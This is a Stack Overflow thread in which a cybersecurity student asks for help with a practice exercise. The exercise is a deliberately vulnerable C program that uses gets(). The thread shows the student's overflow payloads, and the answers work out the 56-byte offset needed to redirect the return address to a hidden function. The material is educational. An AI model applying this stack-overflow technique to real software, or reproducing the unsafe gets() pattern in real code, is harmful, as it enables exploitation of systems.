buffer overflow exercise in c
I am a cybersecurity student and I was doing an exercise in which I have to access the vip_queue function through a buffer overflow without changing the value of check. I've been trying for hours but I haven't gotten any results. I hope you can help me, thank you. This is the code:
#include <stdio.h>
#include <stdlib.h>

typedef struct {
    char name[32];
    int check;
} user_data;

void banner() {
    puts(" _   _ _          _____");
    puts("| \\ | (_) ___ ___|  ___|__  _ __ _   _ _ __ ___  ___");
    puts("|  \\| | |/ __/ _ \\ |_ / _ \\| '__| | | | '_ ` _ \\/ __|");
    puts("| |\\  | | (_|  __/  _| (_) | |  | |_| | | | | | \\__ \\");
    puts("|_| \\_|_|\\___\\___|_|  \\___/|_|   \\__,_|_| |_| |_|___/");
    puts("\n\n\n");
}

void vip_queue() {
    puts("[+] Your user is in the VIP list. Thanks for subscribing :D");
    puts("===================================");
    puts("===================================");
    puts("====      CONGRATULATIONS      ====");
    puts("===================================");
    puts("====        YOU MANAGED        ====");
    puts("====   TO EXPLOIT THE BINARY   ====");
    puts("===================================");
    puts("===================================");
    puts("==  STACK BASED BUFFER OVERFLOW  ==");
    puts("===================================");
    puts("===================================");
}

void get_user_info() {
    
    user_data data;
    data.check = 0;

    puts("[+] Welcome to NiceForums!");
    puts("[+] Please, submit your name or alias to continue with the subscription.");

    puts("Name or Alias:");
    gets(data.name);

    if ( data.check != 0 ) {
        puts("[!] ALERT! Stop trying strange stuff >:(");
        exit(1);
    }
    return; 
}

int main() {

    banner();
    
    get_user_info();

    puts("[!] There are no places available for non VIP users and you don't figure as one.");
}

i tried:
python2 -c "print 32 * b'A' + '\x00\x00\x00\x00\x00\x00\x00\x00' + '\xa7\x11\x40\x00\x00\x00\x00\x00'" > output9.txt

where \xa7\x11\x40\x00\x00\x00\x00\x00 is the address where the function vip_queue is stored at
and also:
python2 -c "print 36 * b'A' + '\xa7\x11\x40\x00\x00\x00\x00\x00'" > output8.txt

python2 -c "print 32 * b'A' + 4 * b'0' + '\xa7\x11\x40\x00\x00\x00\x00\x00'" > output7.txt

python2 -c "print 32 * b'A' + '\x00\x00\x00\x00' + '\xa7\x11\x40\x00\x00\x00\x00\x00'" > output78

I executed the code with this:
gcc -no-pie -fno-stack-protector nice_forums.c -o nice_forums


All exploit exercises are specific to the computing environment used by the course, including the compiler, its version, the switches used to compile, the operating system and its program loader, and possibly other factors. You should ensure you are using the environment prescribed for the course (rather than a different environment on your own computer) and ought to direct questions to the course instructor. To ask on Stack Overflow, you need to provide a good deal more information than is in the question, including all of the environment details.

Sorry, my bad. This is everything i had to install (separated by ;): sudo apt update; sudo apt install gdb python2 python3 python3-
pip python3-dev git libssl-dev libffi-dev
build-essential ; git clone https://github.com/pwndbg/pwndbg ; cd pwndbg ;  ./setup.sh ; python3 -m pip install --upgrade pip ; sudo python3 -m pip install --upgrade pwntools

thank you so much for the tips! Also i did not turn off ASLR

Note that gets() is no longer part of the standard C library for over 12 years.

Its an exercise to practice

@chux-ReinstateMonica Because it allows buffer overflows. Which is exactly what the OP wants.

My guess is that you are supposed to overflow data.name in get_user_info so that the return address of the function get_user_info gets changed to the address of the function vip_queue. However, most modern operating systems use ASLR, which will probably make this exploit not work. Since you stated that you did not disable ASLR, your question does not make sense to me, unless ASLR is disabled and you are unaware of it.

When you run the program in a debugger, what is the address of data.name? And at what address is the return address of the function get_user_info stored? If the difference between both addresses is not exactly 36 bytes, then I believe your posted exploits will not work.

Probably also needs to disable any stack protection (e.g. -fno-stack-protector)

this is the memory address of data.name: 0x7fffffffdce0 and this is the return address of get_user_info: 0x0000000000401272. I thought the bytes were calculated by the size of each variable, i just started studying how buffers work so sorry if im wrong

@LHLaurini yes! thats exacly what i did here:gcc -no-pie -fno-stack-protector nice_forums.c -o nice_forums
but still no clue why it isnt working

Please add that command to the question.

@cucaracha: I had asked you "at what address is the return address [...] stored?". So I was asking you for the address of the return address on the stack. You appear to have told me the value of the return address instead. That is not what I asked you for. You should be able to see the memory layout by running the program in a debugger.

When I test your code in the online debugger www.onlinegdb.com, set a breakpoint at the start of the function get_user_info and then use the GDB command x/16ag &data to inspect the memory on the stack, I find that there are 56 bytes between the address of data and the address of the return address. Your solution seems to be assuming that there is a difference of 36 bytes, which I believe would only be plausible on a 32-bit platform (due to alignment) and when a frame pointer is not used.

@Barmar Rather than obsolete gets(), today's exploit could use scanf("%s", ...) or scanf("%[^\n]", ...) which are still valid in C.  IMHO, the exploit of gets() reflects old lesson plans and not so energetic instructors with little attempt to remain up-to-date.

@chux-ReinstateMonica True. You can also use fgets() with size > buffer size. It's kind of interesting that when they deprecated/removed gets() they didn't do anything about these other constructs that are just as dangerous and common.

You're going in the right direction, but you're making incorrect assumptions about the location of the return address. We can take a look at the disassembled function using objdump -S.
For me, it looks like this (may be different for you):
[...]
0000000000401262 <get_user_info>:

void get_user_info() {
  401262:       55                      push   %rbp
  401263:       48 89 e5                mov    %rsp,%rbp
  401266:       48 83 ec 30             sub    $0x30,%rsp
  [...]
  4012d0:       c9                      leave
  4012d1:       c3                      ret
[...]

So, in this case, we have 0x30 + 8 bytes (push %rbp) = 56 bytes before the return address. Therefore, you need 32 bytes for name, 4 zero bytes for check, plus 20 extra bytes and then the address of vip_queue.
EDIT:
But why 56?

The rbp register is pushed into the stack - 8 bytes;
sizeof(user_data) == 36 - so 36 more bytes;
AFAIK, the x86-64 ABI requires the stack pointer to be 16-byte aligned (a multiple of 16) - so 36 bytes become 48.

8 + 48 = 56.

ohhh i see, i wasnt being aware of the 20 extra bytes. How did you get into that conclusion? Also, why 56 bytes?
